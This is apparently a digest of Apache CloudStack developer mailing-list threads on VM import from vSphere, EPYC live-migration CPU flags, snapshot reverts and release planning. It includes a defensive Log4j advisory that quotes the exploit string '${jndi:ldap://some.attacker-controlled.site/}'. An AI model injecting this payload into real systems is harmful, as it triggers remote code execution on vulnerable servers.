Re: import existing instance from vsphere to cloudstack failed

2021-12-13 Thread Abhishek Kumar
Hi Haven,

From the error, the API is failing to find the local storage pool for the volume
for disk ID 2-2000. I'm not sure importing a VM with local storage is widely
tested, so there could be an issue there. There could also be a difference in the
pool's path as returned by the listUnmanagedInstances vs listStoragePools APIs.
Can you please share the output of:

  *   the listUnmanagedInstances API for the VM
  *   the listStoragePools API for the storage pool that corresponds to the
      datastore named localsr1
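
If it helps, below is a rough, untested sketch that compares the two outputs side
by side. It assumes the usual API key/secret request signing and only uses fields
visible in the API responses; the endpoint, keys and cluster ID are placeholders
you'd need to fill in:

import base64, hashlib, hmac, urllib.parse, requests

URL = "http://x.x.x.x:8090/client/api"      # your management server (placeholder)
KEY, SECRET = "<apiKey>", "<secretKey>"     # placeholder credentials
CLUSTER_ID = "<cluster uuid>"               # placeholder cluster ID

def cs_api(command, **kwargs):
    # Standard CloudStack signing: sort params, URL-encode, lowercase,
    # HMAC-SHA1 with the secret key, base64.
    params = {"command": command, "apiKey": KEY, "response": "json", **kwargs}
    query = "&".join("%s=%s" % (k, urllib.parse.quote(str(v), safe="*"))
                     for k, v in sorted(params.items()))
    sig = base64.b64encode(hmac.new(SECRET.encode(), query.lower().encode(),
                                    hashlib.sha1).digest()).decode()
    return requests.get(URL, params={**params, "signature": sig}, timeout=60).json()

pools_resp = cs_api("listStoragePools", clusterid=CLUSTER_ID)
pools = pools_resp["liststoragepoolsresponse"].get("storagepool", [])
names = {p["name"] for p in pools}
paths = {p["path"] for p in pools}

vms = cs_api("listUnmanagedInstances", clusterid=CLUSTER_ID)
for vm in vms["listunmanagedinstancesresponse"].get("unmanagedinstance", []):
    for disk in vm.get("disk", []):
        ds = disk.get("datastorename")
        print(vm["name"], disk["id"], ds,
              "name match" if ds in names else "NO name match",
              "path match" if ds in paths else "NO path match")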

Regards,
Abhishek

From: haven <382829...@qq.com.INVALID>
Sent: 10 December 2021 22:02
To: dev 
Subject: import existing instance from vsphere to cloudstack failed

Hi devs
    I tried to import an existing instance from vSphere into CloudStack, but it
failed. The instance uses a vSphere local storage datastore. I have already
enabled local storage for the VMware zone and can see that local storage pool in
CloudStack, but I get the same error again. Is there any way to import it normally?


ENV:
Version: CloudStack 4.15.2
vSphere: 6.5


API:
http://x.x.x.x:8090/client/api/?clusterid=8f5efc66-17a9-4f80-925b-92722a04a501&name=localstorage&serviceofferingid=a9544da9-cc83-4ed0-9cf5-52e46f9e9361&command=importUnmanagedInstance&nicnetworklist[0].network=7b0b27c0-7827-4505-9c53-a7969406562b&nicnetworklist[0].nic=%E7%BD%91%E7%BB%9C%E9%80%82%E9%85%8D%E5%99%A8%201&response=json


Error:
{"queryasyncjobresultresponse":{"accountid":"623017de-4b49-11ec-b1af-52540044e80f","userid":"6232957f-4b49-11ec-b1af-52540044e80f","cmd":"org.apache.cloudstack.api.command.admin.vm.ImportUnmanagedInstanceCmd","jobstatus":2,"jobprocstatus":0,"jobresultcode":530,"jobresulttype":"object","jobresult":{"errorcode":530,"errortext":"Storage
 pool for disk 硬盘 1(2-2000) with datastore: localsr1 not found in zone ID: 
db959f5f-2b65-435f-8cd7-2efb7d87c3c7"},"created":"2021-12-10T13:10:29+0800","completed":"2021-12-10T13:10:30+0800","jobid":"2ce8de02-8abc-41ef-acd5-2c205b206598"}}

 



[ADVISORY] CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)

2021-12-13 Thread Rohit Yadav
On 9th December 2021, a new zero-day vulnerability for Apache Log4j
was reported. It is now tracked as CVE-2021-44228:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228.

The CVE-2021-44228 vulnerability is classified at the highest severity
level and allows an attacker to execute arbitrary code by injecting a
sub-string of the form "${jndi:ldap://some.attacker-controlled.site/}"
into a logged message. Apache Log4j 2.x is reported to be affected, as
it performs a lookup (string substitution) using the JNDI protocol
whenever the "${jndi:...}" string is found within a message parameter.

The Apache Log4j developers [1] and the SLF4J project's advisory [2]
confirm that Apache Log4j 1.x does not offer a lookup mechanism and
does not suffer from the remote code execution (RCE) vulnerability of
CVE-2021-44228.

All Apache CloudStack releases since v4.6 use Apache Log4j version
1.2.17 and are therefore not affected by this RCE vulnerability. Most
users who haven't changed the default log4j XML config don't need to
do anything; advanced users can check and fix their log4j XML
configuration if they're using any custom JMS appenders.

The Apache CloudStack project will consider migrating to a different
version of Apache Log4j in future releases.

[1] https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
[2] http://slf4j.org/log4shell.html

--


Re: Multiple Management Servers Support on agents

2021-12-13 Thread Daan Hoogland
Benoit, you are mostly right in your understanding; the MS load balancing
is implemented in the agent, so it won't work on any Xen varieties, as these
use an attached agent in the management server itself. The same also holds
for all VMware versions.
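
For reference, on KVM the agent side of this is just a comma-separated list of
management servers in /etc/cloudstack/agent/agent.properties, roughly like the
sketch below (addresses are placeholders); XenServer/XCP-ng and VMware hosts have
no such agent config, which is why that mechanism doesn't apply to them:

# /etc/cloudstack/agent/agent.properties (example values only)
host=10.0.0.11,10.0.0.12,10.0.0.13
port=8250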

On Tue, Dec 7, 2021 at 3:07 PM benoit lair  wrote:

> Hello folks,
>
> I am looking for solutions for HA of the mgmt servers
> I would like to avoid the use of an external load balancer
>
> I see this in doc :
>
> https://docs.cloudstack.apache.org/en/4.16.0.0/adminguide/reliability.html#management-server-load-balancing
> and in the cwiki it talks about KVM agent :
>
> https://cwiki.apache.org/confluence/display/CLOUDSTACK/Multiple+Management+Servers+Support+on+agents
>
> Does this mean it does not work with XCP-ng servers?
> XCP-ng can't know which mgmt server must be contacted in case of failure?
>
> Regards, Benoit
>


-- 
Daan


[PROPOSE] RM for 4.16.1

2021-12-13 Thread Suresh Anaparti
Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose we have a window of at least 8 weeks (2 months) to allow the community
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (maybe
in late Feb 2022 or early Mar 2022). I'll propose the timeline details by the end
of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh

 



Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Katie F.
Thank you. I look forward to the proposal status and hopeful fixes.
~Kathleen Foos

Sent from my iPhone.

> On Dec 13, 2021, at 8:10 AM, Suresh Anaparti  
> wrote:
> 
> Hi All,
> 
> I'd like to put myself forward as the release manager for 4.16.1.0. My 
> colleague Nicolas Vazquez will support me as the co-RM for the PR 
> reviews/tests/merges, and others are welcome to support as well.
> 
> I propose we have a window of at least 8 weeks (2 months) to allow the 
> community / users to test 4.16.0.0 and report issues, and aim to cut RC1 in 
> Q1 2022 (maybe in late Feb 2022 or early Mar 2022). I'll propose the timeline 
> details by the end of this week. I hope to have your support.
> 
> Please let me know if you have any thoughts / comments.
> 
> 
> Regards,
> Suresh
> 
> 
> 


Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04

2021-12-13 Thread Marcus
That does sound like some sort of libvirt issue, then. I don't know why it would
fail to transfer with "unknown CPU feature" when the source VM XML is not
calling for it or for a model that would include it.

On Sat, Dec 11, 2021 at 3:32 AM Wido den Hollander  wrote:

>
>
> On 11-12-2021 at 00:52, Marcus wrote:
> > Just for clarity - Wido you mention that you tried using a common CPU
> model
> > across the platforms (which presumably doesn't contain npt) but migration
> > still fails on npt missing. That does seem like a bug of some sort, I
> would
> > expect that the following should work:
> >
>
> Indeed, that failed.
>
> > * Update cloudstack agent configs to use 'EPYC-IBPB' common identical
> > model, restart agent
> > * Stop VM on source host (ubuntu 20.04)
> > * Start VM on source host (ubuntu 20.04) - at this point you should not
> > have a feature 'npt' in the XML of the running VM. If you do then there's
> > something wrong with the EPYC-IBPB or libvirt's interpretation
> > * Attempt to migrate to destination host (ubuntu 18.04)
> >
> > Is this process failing? Just want to ensure the source VM was restarted
> > and does not contain npt in the XML (and also on the resulting qemu
> command
> > line), but still the migration complains about missing that feature.
> >
>
> I tried with EPYC-IBPB as well and restarted the VM prior to the migration.
>
> 20.04 -> 18.04 fails even though the IBPB model in libvirt is exactly
> the same between 18 and 20.
>
> It complains about the npt feature lacking and thus the migration fails.
>
> > I'm also making an assumption here that /proc/cpuinfo on an Epyc 7552
> does
> > not have npt, but an Epyc 7662 does. Is that correct?
> >
>
> Correct.
>
> > On Tue, Dec 7, 2021 at 6:46 AM Gabriel Bräscher 
> > wrote:
> >
> >> Paul, I confused the issues then.
> >>
> >> The one I mentioned fits only with what Wido reported in this thread.
> >> The CPU flag matches with the ones raised on that bug. Flags like *npt*
> &
> >> *nrip-save* which are present when SVM is enabled.
> >> Therefore, affected by kernel commit -- 52297436199d ("kvm: svm: Update
> >> svm_xsaves_supported").
> >> Additionally, the OS/Qemu versions also do fit with what is reported on
> >> Ubuntu' qemu package "bug #1887490".
> >>
> >> Regards
> >>
> >> On Tue, Dec 7, 2021 at 12:10 PM Paul Angus 
> >> wrote:
> >>
> >>> The qemu-ev 2.10 bug was first reported a year or two ago in the
> mailing
> >>> lists.
> >>>
> >>> -Original Message-
> >>> From: Gabriel Bräscher 
> >>> Sent: Tuesday, December 7, 2021 9:41 AM
> >>> To: dev 
> >>> Subject: Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04
> >>>
> >>> Just adding to the "qemu-ev 2.10" & "qemu-ev 2.12" point.
> >>>
>  migration fails from qemu-ev 2.10 to qemu-ev 2.12, this is definitely
>  a bug in my point of view.
> 
> >>>
> >>> On the comment 53 (at "bug #1887490"):
> >>>
>  It seems *one of the patches also introduced a regression*:
>  * lp-1887490-cpu_map-Add-missing-AMD-SVM-features.patch
>  adds various SVM-related flags. Specifically *npt and nrip-save are
>  now expected to be present by default* as shown in the updated
> >> testdata.
>  This however breaks migration from instances using EPYC or EPYC-IBPB
>  CPU models started with libvirt versions prior to this one because the
>  instance on the target host has these extra flags
> >>>
> >>>
> >>>  From the tests reported there, it fails in both ways.
> >>> 1. From *older* qemu package to *newer*:
> >>>  *source* host does not map the CPU flag; however, *target* host
> >>> expects the flag to be there, by default.
> >>> 2. From *newer* qemu package to *older*:
> >>>  the instance "domain.xml" in the *source* host has a CPU flag
> that is
> >>> not mapped by qemu in the *target* host.
> >>>
> >>>
> >>>
> >>> On Tue, Dec 7, 2021 at 10:22 AM Sven Vogel  wrote:
> >>>
>  Let me check. We had the same problem on RHEL/CentOS but I am not sure
>  if this a bug. What I know there was a change in the XML. Let me ask
>  one on my colleges in my team.
> 
>  😉
> 
> 
>  __
> 
>  Sven Vogel
>  Senior Manager Research and Development - Cloud and Infrastructure
> 
>  EWERK DIGITAL GmbH
>  Brühl 24, D-04109 Leipzig
>  P +49 341 42649 - 99
>  F +49 341 42649 - 98
>  s.vo...@ewerk.com
>  www.ewerk.com
> 
>  Geschäftsführer:
>  Dr. Erik Wende, Hendrik Schubert, Tassilo Möschke
>  Registergericht: Leipzig HRB 9065
> 
>  Support:
>  +49 341 42649 555
> 
>  Zertifiziert nach:
>  ISO/IEC 27001:2013
>  DIN EN ISO 9001:2015
>  DIN ISO/IEC 2-1:2018
> 
>  ISAE 3402 Typ II Assessed
> 
>  EWERK-Blog | LinkedIn<
>  https://www.linkedin.com/company/ewerk-group> | Xing<
>  https://www.xing.com/company/ewerk> | Twitter<
>  https://twitter.com/EWERK_Group> | Facebook<
>  https://de-de.facebook.co

Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04

2021-12-13 Thread Marcus
Sorry, just piecing this together and looking at things that have probably
already been looked at!

Looking at the libvirt CPU XML files, it's interesting that both
x86_EPYC-Milan.xml and x86_EPYC-Rome.xml have 'npt'. I guess the Ubuntu
kernel on 18.04 doesn't support npt; you'd see the difference under the
host XML in the 'virsh capabilities' command.

This would be similar to the 'vmx' flag for nested virtualization. You
won't find the 'vmx' capability in any of the CPU XML; however, if you
enable it via the kvm module parameter the VM gets it, and then you can't
migrate to non-vmx hosts even with the same CPU.  If something like this
were happening, though, I'd still expect to see 'npt' in the source VM XML
and on its qemu command line, unless it's a similar but not quite the same issue.
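
If it helps to rule that in or out, here's a rough, untested sketch that diffs
the CPU feature names each host advertises (the same data as the host section
of 'virsh capabilities'); the connection URIs are placeholders:

import xml.etree.ElementTree as ET
import libvirt  # python3-libvirt / libvirt-python

def host_cpu_features(uri):
    # Parse the host <cpu><feature name=.../> entries from the capabilities XML.
    conn = libvirt.open(uri)
    try:
        caps = ET.fromstring(conn.getCapabilities())
        return {f.get("name") for f in caps.findall("./host/cpu/feature")}
    finally:
        conn.close()

src = host_cpu_features("qemu+ssh://root@ubuntu2004-host/system")  # placeholder URI
dst = host_cpu_features("qemu+ssh://root@ubuntu1804-host/system")  # placeholder URI
print("only on source     :", sorted(src - dst))
print("only on destination:", sorted(dst - src))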

On Mon, Dec 13, 2021 at 10:32 AM Marcus  wrote:

> That does sound like some sort of libvirt issue, then. I don't know why it would
> fail to transfer with "unknown CPU feature" when the source VM XML is
> not calling for it or for a model that would include it.
>
> On Sat, Dec 11, 2021 at 3:32 AM Wido den Hollander  wrote:
>
>>
>>
>> On 11-12-2021 at 00:52, Marcus wrote:
>> > Just for clarity - Wido you mention that you tried using a common CPU
>> model
>> > across the platforms (which presumably doesn't contain npt) but
>> migration
>> > still fails on npt missing. That does seem like a bug of some sort, I
>> would
>> > expect that the following should work:
>> >
>>
>> Indeed, that failed.
>>
>> > * Update cloudstack agent configs to use 'EPYC-IBPB' common identical
>> > model, restart agent
>> > * Stop VM on source host (ubuntu 20.04)
>> > * Start VM on source host (ubuntu 20.04) - at this point you should not
>> > have a feature 'npt' in the XML of the running VM. If you do then
>> there's
>> > something wrong with the EPYC-IBPB or libvirt's interpretation
>> > * Attempt to migrate to destination host (ubuntu 18.04)
>> >
>> > Is this process failing? Just want to ensure the source VM was restarted
>> > and does not contain npt in the XML (and also on the resulting qemu
>> command
>> > line), but still the migration complains about missing that feature.
>> >
>>
>> I tried with EPYC-IBPB as well and restarted the VM prior to the
>> migration.
>>
>> 20.04 -> 18.04 fails even though the IBPB model in libvirt is exactly
>> the same between 18 and 20.
>>
>> It complains about the npt feature lacking and thus the migration fails.
>>
>> > I'm also making an assumption here that /proc/cpuinfo on an Epyc 7552
>> does
>> > not have npt, but an Epyc 7662 does. Is that correct?
>> >
>>
>> Correct.
>>
>> > On Tue, Dec 7, 2021 at 6:46 AM Gabriel Bräscher 
>> > wrote:
>> >
>> >> Paul, I confused the issues then.
>> >>
>> >> The one I mentioned fits only with what Wido reported in this thread.
>> >> The CPU flag matches with the ones raised on that bug. Flags like
>> *npt* &
>> >> *nrip-save* which are present when SVM is enabled.
>> >> Therefore, affected by kernel commit -- 52297436199d ("kvm: svm: Update
>> >> svm_xsaves_supported").
>> >> Additionally, the OS/Qemu versions also do fit with what is reported on
>> >> Ubuntu' qemu package "bug #1887490".
>> >>
>> >> Regards
>> >>
>> >> On Tue, Dec 7, 2021 at 12:10 PM Paul Angus 
>> >> wrote:
>> >>
>> >>> The qemu-ev 2.10 bug was first reported a year or two ago in the
>> mailing
>> >>> lists.
>> >>>
>> >>> -Original Message-
>> >>> From: Gabriel Bräscher 
>> >>> Sent: Tuesday, December 7, 2021 9:41 AM
>> >>> To: dev 
>> >>> Subject: Re: Live migration between AMD Epyc and Ubuntu 18.04 and
>> 20.04
>> >>>
>> >>> Just adding to the "qemu-ev 2.10" & "qemu-ev 2.12" point.
>> >>>
>>  migration fails from qemu-ev 2.10 to qemu-ev 2.12, this is definitely
>>  a bug in my point of view.
>> 
>> >>>
>> >>> On the comment 53 (at "bug #1887490"):
>> >>>
>>  It seems *one of the patches also introduced a regression*:
>>  * lp-1887490-cpu_map-Add-missing-AMD-SVM-features.patch
>>  adds various SVM-related flags. Specifically *npt and nrip-save are
>>  now expected to be present by default* as shown in the updated
>> >> testdata.
>>  This however breaks migration from instances using EPYC or EPYC-IBPB
>>  CPU models started with libvirt versions prior to this one because
>> the
>>  instance on the target host has these extra flags
>> >>>
>> >>>
>> >>>  From the tests reported there, it fails in both ways.
>> >>> 1. From *older* qemu package to *newer*:
>> >>>  *source* host does not map the CPU flag; however, *target* host
>> >>> expects the flag to be there, by default.
>> >>> 2. From *newer* qemu package to *older*:
>> >>>  the instance "domain.xml" in the *source* host has a CPU flag
>> that is
>> >>> not mapped by qemu in the *target* host.
>> >>>
>> >>>
>> >>>
>> >>> On Tue, Dec 7, 2021 at 10:22 AM Sve

Reverting to VM Snapshots fail if VM is powered off+on

2021-12-13 Thread Sean Lair
We are seeing a strange problem in our ACS environments.  We are running 
CentOS 7 as our hypervisors.  When we take a VM snapshot and then later revert 
to it, it works as long as we haven't stopped and started the VM.  If we stop 
the VM and start it again - even if it is still on the same host - we cannot 
revert back to the VM snapshot.  Here is the error and further information.  Any 
ideas?  It is 100% reproducible for us.


2021-12-13 22:50:51,731 DEBUG [c.c.a.t.Request] (AgentManager-Handler-12:null) 
(logid:) Seq 101-5603885311332466879: Processing:  { Ans: , MgmtId: 
345051498372, via: 101, Ver: v1, Flags: 10, 
[{"com.cloud.agent.api.RevertToVMSnapshotAnswer":{"result":false,"details":" 
Revert to VM snapshot failed due to org.libvirt.LibvirtException: revert 
requires force: Target CPU feature count 3 does not match source 0","wait":0}}] 
}
2021-12-13 22:50:51,732 ERROR [o.a.c.s.v.DefaultVMSnapshotStrategy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Revert VM: i-2-317-VM to snapshot: 
i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot failed due to 
org.libvirt.LibvirtException: revert requires force: Target CPU feature count 3 
does not match source 0
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
2021-12-13 22:50:51,743 ERROR [c.c.v.VmWorkJobHandlerProxy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Invocation exception, caused by: 
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
2021-12-13 22:50:51,743 INFO  [c.c.v.VmWorkJobHandlerProxy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Rethrow exception 
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
Caused by: com.cloud.utils.exception.CloudRuntimeException: Revert VM: 
i-2-317-VM to snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to 
VM snapshot failed due to org.libvirt.LibvirtException: revert requires force: 
Target CPU feature count 3 does not match source 0


[root@labcloudkvm02 ~]# virsh dumpxml 33
...
  <cpu ...>
    <model ...>IvyBridge</model>
    <feature .../>
    <feature .../>
    <feature .../>
  </cpu>
...


[root@labcloudkvm02 ~]# virsh dumpxml 33 --migratable
...
  <cpu ...>
    <model ...>IvyBridge</model>
  </cpu>
...


[root@labcloudkvm02 ~]# virsh snapshot-dumpxml 33 i-2-317-VM_VS_20211213224802
...
  <cpu ...>
    <model ...>IvyBridge</model>
    <feature .../>
    <feature .../>
    <feature .../>
  </cpu>
...

In agent.properties:
guest.cpu.model=IvyBridge
guest.cpu.mode=custom
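
For reference, a rough, untested sketch like the one below should show which CPU
features the snapshot XML records versus what the running and migratable domain
XML carry (domain and snapshot names taken from the log above):

import xml.etree.ElementTree as ET
import libvirt  # python3-libvirt on the KVM host

def cpu_features(xml_text):
    # Collect <feature name=.../> entries under any <cpu> element.
    return {f.get("name") for f in ET.fromstring(xml_text).findall(".//cpu/feature")}

conn = libvirt.open("qemu:///system")
dom = conn.lookupByName("i-2-317-VM")
snap = dom.snapshotLookupByName("i-2-317-VM_VS_20211213224802")

print("running domain :", sorted(cpu_features(dom.XMLDesc(0))))
print("migratable xml :", sorted(cpu_features(dom.XMLDesc(libvirt.VIR_DOMAIN_XML_MIGRATABLE))))
print("snapshot xml   :", sorted(cpu_features(snap.getXMLDesc(0))))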


Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Harikrishna Patnala
Thank you and good luck Suresh, Nicolas.

Regards,
Harikrishna

From: Suresh Anaparti 
Sent: Monday, December 13, 2021 6:39 PM
To: dev@cloudstack.apache.org 
Cc: us...@cloudstack.apache.org 
Subject: [PROPOSE] RM for 4.16.1

Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose we have a window of at least 8 weeks (2 months) to allow the community
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (maybe
in late Feb 2022 or early Mar 2022). I'll propose the timeline details by the end
of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh




 



Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Rohit Yadav
Sounds good to me, thanks for volunteering Suresh.

Regards.

From: Harikrishna Patnala 
Sent: Tuesday, December 14, 2021 9:34:43 AM
To: dev@cloudstack.apache.org ; 
us...@cloudstack.apache.org 
Subject: Re: [PROPOSE] RM for 4.16.1

Thank you and good luck Suresh, Nicolas.

Regards,
Harikrishna

From: Suresh Anaparti 
Sent: Monday, December 13, 2021 6:39 PM
To: dev@cloudstack.apache.org 
Cc: us...@cloudstack.apache.org 
Subject: [PROPOSE] RM for 4.16.1

Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose we have a window of at least 8 weeks (2 months) to allow the community
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (maybe
in late Feb 2022 or early Mar 2022). I'll propose the timeline details by the end
of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh







 



Re: import existing instance from vsphere to cloudstack failed

2021-12-13 Thread haven
Hi Abhishek,
     Thanks for your reply; info below:



 listUnmanagedInstances API for the VM

{"listunmanagedinstancesresponse":{"count":2,"unmanagedinstance":[{"name":"vc01","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","hostid":"a75916bf-eb08-45cd-9101-7a2cabf06d6e","powerstate":"PowerOn","cpunumber":4,"cpucorepersocket":1,"cpuspeed":0,"memory":8192,"osid":"windows8Server64Guest","osdisplayname":"Microsoft
 Windows Server 2012 (64 ??)","disk":[{"id":"1-2000","label":" 
1","capacity":53687091200,"imagepath":"[localsr1] 
acs/acs.vmdk","controller":"lsisas1068","controllerunit":0,"position":0,"datastorename":"localsr1"}],"nic":[{"id":"??
 1","networkname":"VM 
Network","macaddress":"00:0c:29:62:31:ad","vlanid":0,"adaptertype":"E1000"}]},{"name":"localstorage","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","hostid":"a75916bf-eb08-45cd-9101-7a2cabf06d6e","powerstate":"PowerOn","cpunumber":1,"cpucorepersocket":1,"cpuspeed":0,"memory":2048,"osid":"centos7_64Guest","osdisplayname":"CentOS
 7 (64 ??)","disk":[{"id":"2-2000","label":" 
1","capacity":17179869184,"imagepath":"[localsr1] 
localstorage/localstorage.vmdk","controller":"pvscsi","controllerunit":0,"position":0,"datastorename":"localsr1"}],"nic":[{"id":"??
 1","macaddress":"00:50:56:b4:fa:53","adaptertype":"Vmxnet3"}]}]}}



listStoragePools

{"liststoragepoolsresponse":{"count":5,"storagepool":[{"id":"a8eab88e-b302--92d1-04e3b83d47b7","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"datastore1","ipaddress":"VMFS
 datastore: 
datastore-10","path":"datastore-10","created":"2021-12-09T10:28:07+0800","type":"VMFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":118648471552,"disksizeallocated":0,"disksizeused":7552892928,"state":"Up","scope":"HOST","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"a34f25c3-3452-3441-828c-302a2c6f7f03","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"nfs1","ipaddress":"10.226.18.132","path":"/Datacenter1/nfs1","created":"2021-12-08T15:05:34+0800","type":"NFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":11005929193472,"disksizeallocated":34365323222,"disksizeused":195802693632,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"f42dea39-fa23-3e27-9062-45381b9cc1c7","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"nfs2","ipaddress":"10.226.18.132","path":"/Datacenter1/nfs2","created":"2021-12-08T13:55:49+0800","type":"NFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":11005933387776,"disksizeallocated":4194304000,"disksizeused":195802693632,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"44069041-572d-32b0-abc4-745b97eae508","zoneid":"690eaa87-5228-4192-a388-ea250b58d963","zonename":"uat","podid":"f0a0d079-2944-45bd-8c77-b60b09330eff","podname":"SP01","name":"Ceph
 
RBD","ipaddress":"10.100.250.11,10.100.250.12,10.100.250.13","path":"rbd","created":"2021-11-22T12:22:40+0800","type":"RBD","clusterid":"d384ab7a-1377-4371-b444-e0d7150536d6","clustername":"defaultGroupName","disksizetotal":36332551200768,"disksizeallocated":4691748454400,"disksizeused":1808940470272,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"89f42f77-6c2b-4bd6-885c-4bb24a09366c","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"localsr1","ipaddress":"VMFS
 datastore: 
datastore-11","path":"datastore-11","created":"2021-12-09T10:28:07+0800","type":"VMFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":4000762036224,"disksizeallocated":0,"disksizeused":83411075072,"state":"Up","scope":"HOST","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}}]}}


------ Original Message ------
From: "dev"

http://x.x.x.x:8090/client/api/?clusterid=8f5efc66-17a9-4f80-925b-92722a04a501&name=localstorage&serviceofferingid

[GitHub] [cloudstack-terraform-provider] harikrishna-patnala commented on issue #17: Removing an ACL list from a network corrupts state file

2021-12-13 Thread GitBox


harikrishna-patnala commented on issue #17:
URL: 
https://github.com/apache/cloudstack-terraform-provider/issues/17#issuecomment-993246719


   @synergiator, may I know the exact configuration that you are using?
   When I tried creating a VPC and a tier in it with an ACL ID, and then removing the ACL 
   ID from that tier, these steps worked fine.
   
   ```
   -/+ resource "cloudstack_network" "tier1" {
 ~ acl_id   = "59d048bb-8329-4817-9124-972a91743778" -> "none" 
# forces replacement
   
   ```
   Upon removing acl_id from the resource or setting "acl_id = null", both 
   resulted in the above operation and were successful.
   
   May I know what configuration, and what change in the configuration, triggered 
   your error?
   ```
   
   module.vpc.cloudstack_network.private[0] will be updated in-place
 ~ resource "cloudstack_network" "private" {
 - acl_id   = "none" -> null
   ```
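
   For reference, the kind of configuration I tested is roughly the following (offering 
   names, zone and CIDRs are placeholders, so please adapt before comparing with your setup):
   
   ```
   resource "cloudstack_vpc" "test" {
     name         = "test-vpc"
     cidr         = "10.0.0.0/16"
     vpc_offering = "Default VPC offering"
     zone         = "zone1"
   }
   
   resource "cloudstack_network_acl" "acl1" {
     name   = "acl1"
     vpc_id = cloudstack_vpc.test.id
   }
   
   resource "cloudstack_network" "tier1" {
     name             = "tier1"
     cidr             = "10.0.1.0/24"
     network_offering = "DefaultIsolatedNetworkOfferingForVpcNetworks"
     zone             = "zone1"
     vpc_id           = cloudstack_vpc.test.id
     acl_id           = cloudstack_network_acl.acl1.id   # removing this line produced the forced replacement shown earlier
   }
   ```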


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: dev-unsubscr...@cloudstack.apache.org

For queries about this service, please contact Infrastructure at:
us...@infra.apache.org